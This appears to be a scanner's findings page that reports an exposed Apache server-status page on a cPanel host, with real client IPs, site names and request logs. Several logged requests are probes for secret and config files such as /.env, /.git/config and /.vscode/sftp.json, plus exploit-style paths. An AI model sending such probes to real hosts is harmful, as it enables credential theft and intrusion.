      129.208.205.194http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/skXknSzkQSYJEzHIhi1EWt
      
      1-9209680/730/5237_
      89.6914524115745600.0111.291978.34
      69.171.231.117http/1.1zed.sa:80GET /menu/ HTTP/1.1
      
      1-9209680/710/5033_
      89.56480112449130.0124.861442.15
      31.13.103.116http/1.1zed.sa:443GET /menu/wp-content/themes/kava/assets/js/theme-script.js?ver=
      
      1-9209680/615/4858_
      89.56480798922070.0109.371540.08
      31.13.103.116http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-menu/includes/elementor/assets
      
      1-9209680/708/5070_
      89.56481104221400.058.921676.33
      31.13.103.8http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tabs/assets/js/jet-tabs-fronte
      
      1-9209680/779/5404_
      89.71728132593380.080.522000.09
      129.208.205.194http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      1-9209680/746/5536_
      89.624033141569730.0173.401585.38
      129.208.205.194http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      1-9209682/712/5446K
      Found on 2024-05-08 14:52
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df702508b08

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Wednesday, 01-May-2024 04:21:52 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  1 day 7 hours 45 minutes 7 seconds
      Server load: 0.23 0.38 0.48
      Total accesses: 144113 - Total Traffic: 48.4 GB - Total Duration: 372741805
      CPU Usage: u312.87 s85.03 cu397.63 cs123.29 - .804% CPU load
      1.26 requests/sec - 444.3 kB/second - 352.4 kB/request - 2586.46 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 140 idle workers
      ________________________K.........................____K______K__
      _____________WK__________________________K___________________...
      ...............................................________________K
      __________________R__KK__________...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-140720/355/1038_
      56.66506046930.0116.47262.06
      66.249.64.9http/1.1albayan.edu.sa:80GET /web/457.html2 HTTP/1.1
      
      0-140720/437/1021_
      56.599416924010.082.57227.38
      64.227.70.2http/1.1customers.akg.sa:443GET /telescope/requests HTTP/1.1
      
      0-140720/571/1128_
      56.616315086280.0159.71741.45
      142.93.143.8http/1.1customers.akg.sa:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-140720/369/1043_
      56.599617717320.0110.14315.57
      64.227.70.2http/1.1customers.akg.sa:443GET /_all_dbs HTTP/1.1
      
      0-140720/304/926_
      56.6083768185290.0264.08379.52
      b32f2b056d.scan.leakix.orghttp/1.1trynidaa.com:443GET /server-status HTTP/1.1
      
      0-140720/449/1131_
      56.55188319278040.0155.92342.33
      66.249.64.8http/1.1hawsab.me:80GET /?tff11792wsabr580.html HTTP/1.1
      
      0-140720/389/988_
      56.54207255932430.0180.17293.58
      151.255.128.253http/1.1albayan.edu.sa:443GET /images/image3.jpg HTTP/1.1
      
      0-140720/367/905_
      56.571454513286310.0106.49220.86
      66.249.70.6http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-140720/452/1161_
      56.6262212060170.0175.27460.25
      142.93.143.8http/1.1customers.akg.sa:80GET /.env HTTP/1.1
      
      0-140720/418/1135_
      56.626087412405560.0108.45288.92
      45.11.97.43http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-140720/624/1316_
      55.89214110988220.0149.88669.68
      151.255.128.253http/1.1
      
      0-140720/321/1041_
      56.599715112830.0130.46300.67
      64.227.70.2http/1.1customers.akg.sa:443GET /about HTTP/1.1
      
      0-140720/460/1103_
      56.031245117539450.093.59273.14
      64.225.75.246http/1.1
      
      0-140720/349/863_
      56.59865317401350.0190.88349.67
      64.225.75.246http/1.1trynidaa.com:443GET /about HTTP/1.1
      
      0-140720/371/948_
      56.6165215138650.0102.25353.98
      142.93.143.8http/1.1customers.akg.sa:80GET / HTTP/1.1
      
      0-140720/380/986_
      56.04123114743790.078.46318.99
      64.225.75.246http/1.1
      
      0-140720/368/968_
      56.03119113681030.0168.63391.08
      64.227.70.2http/1.1
      
      0-140720/409/1062_
      56.5811136160517150.0265.95384.36
      20.168.252.83http/1.1albayan.edu.sa:443GET /imgweb/files41/51%20(4).pdf HTTP/1.1
      
      0-140720/313/925_
      56.04120116194240.0121.65388.26
      64.227.70.2http/1.1
      
      0-140720/380/925_
      56.60806612316520.0137.72315.21
      64.225.75.246http/1.1trynidaa.com:443GET /.git/config HTTP/1.1
      
      0-140720/441/1154_
      56.5221348693160.086.10426.70
      2.90.237.106http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-140720/388/1020_
      56.5421139640630.0179.46474.49
      2.90.237.106http/1.1albayan.edu.sa:443GET /images/albayan-new.jpg HTTP/1.1
      
      0-140720/341/931_
      55.90210521067077790.0163.55299.16
      151.255.128.253http/1.1
      
      0-140720/343/968_
      56.653610149526160.0101.50233.88
      5.156.243.66http/1.1albayan.edu.sa:443GET /imgweb/file44/WBs%20on%20Site%2022-23/7th/7th%20BS-T%201-2
      
      0-140721/378/1020K
      56.670120357450.8181.92622.08
      172.70.246.29http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-0-0/0/722.
      0.0049009256260720.00.00256.07
      128.234.111.115http/1.1
      
      1-0-0/0/657.
      0.00490097115672110.00.00256.69
      87.236.176.21http/1.13dvi.com:443GET / HTTP/1.1
      
      1-0-0/0/655.
      0.0049009421969790.00.00212.95
      175.110.230.119http/1.1trydaris.com:443GET /wp-content/themes/betheme-2/muffin-options/svg/menu/dashbo
      
      1-0-0/0/238.
      0.00490091712384420.00.00117.19
      172.71.99.228http/1.1eg.daaris.com:443GET /wp-content/themes/rehub-theme/icons/modulobox.svg HTTP/1.1
      
      1-0-0/0/619.
      0.004900903757590.00.00350.69
      2.90.84.235http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-0-0/0/583.
      0.0049009164912624140.00.00456.07
      31.167.143.155http/1.1
      
      1-0-0/0/601.
      0.004900918571220.00.00292.44
      162.158.190.7http/1.1adyar.com.sa:80GET /wp-includes/wlwmanifest.xml HTTP/1.1
      
      1-0-0/0/696.
      0.004900954089280.00.00120.83
      175.110.230.119http/1.1trydaris.com:443GET /ar/index.php/wp-json/wp/v2/taxonomies?context=edit&per_pag
      
      1-0-0/0/630.
      0.0049009234538690.00.00149.56
      2.90.188.73http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      1-0-0/0/581.
      0.00490091435573<
      Found on 2024-05-01 01:21
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b29fb776

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Wednesday, 01-May-2024 01:29:22 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  1 day 4 hours 52 minutes 37 seconds
      Server load: 0.40 0.34 0.33
      Total accesses: 130311 - Total Traffic: 45.6 GB - Total Duration: 360823520
      CPU Usage: u265.48 s71.98 cu397.63 cs123.29 - .826% CPU load
      1.25 requests/sec - 460.3 kB/second - 367.2 kB/request - 2768.94 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 141 idle workers
      ______________K__________........................._____K________
      ____W___________________________K_____________________K______...
      ...............................................___________K___K_
      ________R______K_________________...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-140720/306/989_
      48.5438546035730.0115.34260.93
      47.128.18.11http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/IMG_20211121_163334-1-scaled.jp
      
      0-140720/331/915_
      48.56312116786899900.080.90225.71
      47.128.36.8http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/IMG_20211121_163334-1-scaled.jp
      
      0-140720/435/992_
      48.654515044720.0157.41739.15
      209.97.180.8http/1.1sradmin.3dvi.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-140720/276/950_
      48.664117076050.076.25281.68
      209.97.180.8http/1.1sradmin.3dvi.com:443GET /.git/config HTTP/1.1
      
      0-140720/253/875_
      48.6635507984480.0262.85378.30
      190.211.255.210http/1.13dvi.com:443GET //we3dvi.com/js/floating-wpp.js HTTP/1.1
      
      0-140720/309/991_
      48.62110118758490.0153.87340.29
      139.59.136.184http/1.1hawsab.me:80GET /v2/_catalog HTTP/1.1
      
      0-140720/348/947_
      48.56275055757420.0173.21286.61
      40.77.167.247http/1.1albayan.edu.sa:80GET /imgweb/booknew/%D8%A7%D9%84%D9%85%D8%B3%D9%84%D9%85%D9%88%
      
      0-140720/276/814_
      48.58169113129420.081.85196.23
      159.223.132.86http/1.1durratalkhamis.alnwisher.com:80GET /server HTTP/1.1
      
      0-140720/358/1067_
      48.52391132312032100.0173.00457.98
      47.128.54.175http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0732-1-scaled.jpg HTTP/1.1
      
      0-140720/385/1102_
      48.5536452612332680.0107.38287.85
      47.128.36.8http/1.1sulaimaniya.edu.sa:443GET /2022/10/09/%d9%85%d8%b4%d8%a7%d8%b1%d9%83%d8%a7%d8%aa-%d8%
      
      0-140720/439/1131_
      48.645039660140.0143.93663.73
      209.97.180.8http/1.1sradmin.3dvi.com:443GET / HTTP/1.1
      
      0-140720/272/992_
      48.437224327450.089.43259.64
      209.97.180.8http/1.1
      
      0-140720/319/962_
      48.553302924517515990.091.97271.52
      47.128.36.8http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0728-1-scaled.jpg HTTP/1.1
      
      0-140720/242/756_
      48.668016952160.0179.81338.59
      17.241.75.23http/1.13dvi.com:80GET /index.php HTTP/1.1
      
      0-140721/329/906K
      48.670115074890.887.11338.84
      172.70.47.85http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-140720/314/920_
      48.61150212248520.071.07311.60
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-140720/266/866_
      48.62108113395560.0152.77375.22
      139.59.136.184http/1.1hawsab.me:80GET /.env HTTP/1.1
      
      0-140720/359/1012_
      48.63103160306430.0211.00329.41
      173.252.83.5http/1.1zed.sa:443GET /wp-content/uploads/2020/02/Light-1-300x282.png HTTP/1.1
      
      0-140720/246/858_
      48.56324190015485410.0101.77368.37
      47.128.36.8http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/WhatsApp-Image-2021-09-01-at-9.
      
      0-140720/299/844_
      48.6016810912142010.0126.33303.83
      f090494790.scan.leakix.orghttp/1.1durratalkhamis.alnwisher.com:80GET /server-status HTTP/1.1
      
      0-140720/389/1102_
      48.6016718328210.083.81424.41
      159.223.132.86http/1.1durratalkhamis.alnwisher.com:80GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-140720/296/928_
      48.572523699274070.0177.22472.25
      40.77.167.230http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%85%D8%B9%D8%AF%D9%84%20%D9%86%D9%85%D8%A7%
      
      0-140720/229/819_
      48.4373266237360.0154.63290.24
      209.97.180.8http/1.1
      
      0-140720/270/895_
      48.5823809413070.076.20208.57
      54.171.175.239http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-140720/317/959_
      48.621085020271420.0166.42606.58
      52.167.144.236http/1.1jawad.com.sa:443GET /ar/details/1663 HTTP/1.1
      
      1-0-0/0/722.
      0.0038659256260720.00.00256.07
      128.234.111.115http/1.1
      
      1-0-0/0/657.
      0.00386597115672110.00.00256.69
      87.236.176.21http/1.13dvi.com:443GET / HTTP/1.1
      
      1-0-0/0/655.
      0.0038659421969790.00.00212.95
      175.110.230.119http/1.1trydaris.com:443GET /wp-content/themes/betheme-2/muffin-options/svg/menu/dashbo
      
      1-0-0/0/238.
      0.00386591712384420.00.00117.19
      172.71.99.228http/1.1eg.daaris.com:443GET /wp-content/themes/rehub-theme/icons/modulobox.svg HTTP/1.1
      
      1-0-0/0/619.
      0.003865903757590.00.00350.69
      2.90.84.235http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-0-0/0/583.
      0.0038659164912624140.00.00456.07
      31.167.143.155http/1.1
      
      1-0-0/0/601.
      0.003865918571220.00.00292.44
      162.158.190.7http/1.1adyar.com.sa:80GET /wp-includes/wlwmanifest.xml HTTP/1.1
      
      1-0-0/0/696.
      0.003865954089280.00.00120.83
      175.110.230.119http/1.1
      Found on 2024-04-30 22:28
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7dd296f31

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Monday, 29-Apr-2024 01:23:10 +03
      Restart Time: Thursday, 18-Apr-2024 04:05:06 +03
      Parent Server Config. Generation: 15
      Parent Server MPM Generation: 14
      Server uptime:  10 days 21 hours 18 minutes 4 seconds
      Server load: 0.33 0.57 0.58
      Total accesses: 3664627 - Total Traffic: 395.2 GB - Total Duration: 3878062938
      CPU Usage: u429.37 s16.29 cu18436.3 cs2587.07 - 2.28% CPU load
      3.9 requests/sec - 440.5 kB/second - 113.1 kB/request - 1058.24 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 213 idle workers
      ___R__________________K_R_______________W____________K__________
      __________K.........................________________K___________
      W________K_______________________C_________________________K____
      _______________________K__________________________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-14256880/8/19172_
      1.201763139372170.00.492201.89
      154.54.249.208http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1735&t=217.113.194.252&c=5 HT
      
      0-14256880/8/19102_
      1.24765884456260.00.091983.75
      23.22.35.162http/1.1daris.live:80GET /product/part/20/80 HTTP/1.1
      
      0-14256880/18/19704_
      1.2212336116399670.00.231703.66
      18.207.135.20http/1.1wahaj.thenewjeddah.com:443GET //wahaj.thenewjeddah.com/js/flatpickr.min.js HTTP/1.1
      
      0-14256880/11/20060R
      0.9437964145405860.00.531895.43
      51.39.93.135http/1.1
      
      0-14256880/9/19008_
      1.10230469146769110.01.231885.35
      40.77.167.65http/1.1albayan.edu.sa:443GET /imgweb/sehreakem114.pdf HTTP/1.1
      
      0-14256880/11/19297_
      1.1818861107488730.00.361948.64
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-14256880/6/17950_
      1.0825052164838600.00.432149.10
      52.167.144.25http/1.1akg.sa:443GET /specialthanks HTTP/1.1
      
      0-14256880/57/19003_
      1.239765136547290.01.372250.05
      52.70.240.171http/1.1daris.live:80GET /product/fav/15 HTTP/1.1
      
      0-14256880/16/17898_
      1.231064202515490.00.442474.33
      217.113.194.249http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1345&t=217.113.194.109&c=5 HT
      
      0-14256880/9/19553_
      1.25574103706980.00.022107.42
      18.217.208.72http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1638&t=35.168.113.248&c=5 HTT
      
      0-14256880/14/20406_
      1.1022071899948830.01.812419.45
      90.156.211.64http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-14256880/13/19617_
      1.2114162104685310.00.112539.35
      3.224.220.101http/1.1daris.live:80GET /product/fav/14 HTTP/1.1
      
      0-14256880/11/18374_
      1.1918289425455250.00.632208.61
      18.207.135.20http/1.1wahaj.thenewjeddah.com:443GET //cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.mi
      
      0-14256880/18/18822_
      1.2211567164265880.01.702736.79
      3.224.220.101http/1.1daris.live:80GET /product/part/24/96 HTTP/1.1
      
      0-14256880/12/18498_
      1.121971117936110.00.471887.52
      2.90.158.158http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_rhs.png HTTP/
      
      0-14256880/22/18774_
      1.0727065106854420.00.771796.18
      3.224.220.101http/1.1daris.live:443GET /product/fav/77 HTTP/1.1
      
      0-14256880/10/19313_
      1.254861142653300.00.101702.20
      23.22.35.162http/1.1daris.live:80GET /product/fav/34 HTTP/1.1
      
      0-14256880/8/18890_
      1.211664117410860.00.791848.43
      217.113.194.249http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1527&t=217.113.194.79&c=5 HTT
      
      0-14256880/20/18875_
      1.26867129031040.02.391720.61
      23.22.35.162http/1.1daris.live:80GET /product/fav/70 HTTP/1.1
      
      0-14256880/10/19245_
      1.221192111545540.00.061739.02
      151.254.197.125http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-14256880/8/19773_
      1.2115363304546500.00.092112.49
      23.22.35.162http/1.1daris.live:80GET /product/fav/65 HTTP/1.1
      
      0-14256880/7/19353_
      1.1121050122638970.00.292035.78
      3.224.220.101http/1.1daris.live:443GET /product/fav/60 HTTP/1.1
      
      0-14256881/10/18947K
      1.2711126879060.80.092276.59
      172.71.99.24http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-14256880/8/18050_
      1.2113752153721560.01.581928.35
      52.70.240.171http/1.1daris.live:80GET /product/part/15/60 HTTP/1.1
      
      0-14256880/5/18675R
      1.0530460042245888680.019.142327.08
      196.150.193.48http/1.1
      
      1-14255070/21/19297_
      1.6012162154919030.00.652381.98
      3.224.220.101http/1.1daris.live:80GET /product/part/15/59 HTTP/1.1
      
      1-14255070/13/20208_
      1.62644154946120.00.162047.57
      217.113.194.250http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1702&t=217.113.194.87&c=5 HTT
      
      1-14255070/11/18616_
      1.5718271170231000.00.082362.63
      18.207.135.20http/1.1wahaj.thenewjeddah.com:443GET //cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
      
      1-14255070/22/18815_
      1.541961143033810.01.501924.36
      2.90.158.158http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      1-14255070/12/18459_
      1.6010639173120190.00.051651.67
      52.70.240.171http/1.1daris.live:80GET /product/part/24/94 HTTP/1.1
      
      1-14255070/30/18675_
      1.5022564136603140.00.701875.96
      3.224.220.101http/1.1daris.live:443GET /product/fav/65 HTTP/1.1
      
      1-14255070/8/19415_
      1.512131157979400.00.132396.54
      157.55.39.225http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      1-14255070/8/1868
      Found on 2024-04-28 22:22
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7f3989585

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Sunday, 28-Apr-2024 23:36:09 +03
      Restart Time: Thursday, 18-Apr-2024 04:05:06 +03
      Parent Server Config. Generation: 14
      Parent Server MPM Generation: 13
      Server uptime:  10 days 19 hours 31 minutes 3 seconds
      Server load: 0.54 0.64 0.61
      Total accesses: 3646116 - Total Traffic: 392.3 GB - Total Duration: 3861739087
      CPU Usage: u620.28 s74.45 cu18160.7 cs2475.43 - 2.28% CPU load
      3.9 requests/sec - 440.3 kB/second - 112.8 kB/request - 1059.14 ms/request
      13 requests currently being processed, 0 workers gracefully restarting, 137 idle workers
      ______K__________KK________________W__K__________________W___K__
      ___________.........................___C________K_______________
      __K______K____________R___________K____________.................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-13296950/112/18960_
      21.41504139316810.029.812197.58
      151.254.188.180http/1.1jawad.com.sa:443GET /public/front_resources/css/responsive.css HTTP/1.1
      
      0-13296950/155/19028_
      21.41628782995030.054.121966.97
      185.191.171.2http/1.1daris.live:80GET /blog/post/14/14 HTTP/1.1
      
      0-13296950/135/19607_
      21.3964276116197870.0121.831685.31
      2.90.77.89http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-13296950/179/19956_
      21.4255113145262770.045.601873.44
      185.220.101.105http/1.1sulaimaniya.edu.sa:443POST /xmlrpc.php HTTP/1.1
      
      0-13296950/142/18937_
      21.49211460146698420.057.261881.48
      52.70.240.171http/1.1daris.live:443GET /bin/admin/profile%20pic/20._Dowie_Sarah.png HTTP/1.1
      
      0-13296950/141/19171_
      21.3610968071105162840.038.671870.16
      37.242.44.242http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1901/%D8%
      
      0-13296951/139/17822K
      21.5401163058210.833.712121.32
      172.70.246.173http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-13296950/211/18885_
      21.37922136165520.097.602244.00
      2.90.127.47http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=3.2.1 HTTP/1.1
      
      0-13296950/117/17765_
      21.38793201825080.018.432471.05
      2.90.127.47http/1.1albayan.edu.sa:443GET /imgweb/1445/1%20-%20%D8%A7%D9%84%D8%AF%D8%B1%D8%A7%D8%B3%D
      
      0-13296950/113/19432_
      21.4439443102381230.088.362060.14
      114.119.156.193http/1.1daris.live:443GET /product/65 HTTP/1.1
      
      0-13296950/174/20317_
      21.35110497958890.0117.882410.70
      95.186.112.55http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-13296950/160/19547_
      21.5141101081380.072.452503.72
      52.70.240.171http/1.1daris.live:443GET /bin/admin/Thumbnail/Kotlin%20Programming%20Language.png HT
      
      0-13296950/126/18291_
      21.48214424990720.07.402200.03
      37.105.168.188http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      0-13296950/169/18722_
      20.9755223164064800.043.762729.94
      51.36.124.142http/1.1
      
      0-13296950/135/18410_
      21.3970253117626740.0171.991883.16
      3.224.220.101http/1.1daris.live:443GET / HTTP/1.1
      
      0-13296950/158/18641_
      21.424947106560150.049.171785.82
      217.113.194.252http/1.1albayan.edu.sa:443GET /e_sch/forum_replies.php?user=web2&i_f=363&page=1 HTTP/1.1
      
      0-13296950/167/19161_
      21.40601142341520.012.741696.65
      2.90.77.89http/1.1albayan.edu.sa:443GET /web/images/name_school.png HTTP/1.1
      
      0-13296952/93/18781K
      21.524103911633401631.9142.161818.22
      46.52.112.48http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/B5WmSzFnyJbJc2I1o6o5GK
      
      0-13296951/101/18774K
      21.5413128316557.151.311688.19
      40.77.167.78http/1.1albayan.edu.sa:443GET /imgweb/cur1438/1/ HTTP/1.1
      
      0-13296950/147/19165_
      21.351107111238120.062.761711.86
      95.186.112.55http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      0-13296950/135/19703_
      21.44241280304487100.017.182110.39
      51.39.77.23http/1.1albayan.edu.sa:443GET /imgweb/qb39/6/had26.pdf HTTP/1.1
      
      0-13296950/143/19282_
      21.5053122403630.040.011946.79
      46.52.112.48http/1.1jawad.com.sa:443GET /public/front_resources/vue/category_product.js HTTP/1.1
      
      0-13296950/123/18829_
      21.04870126592540.0151.902259.80
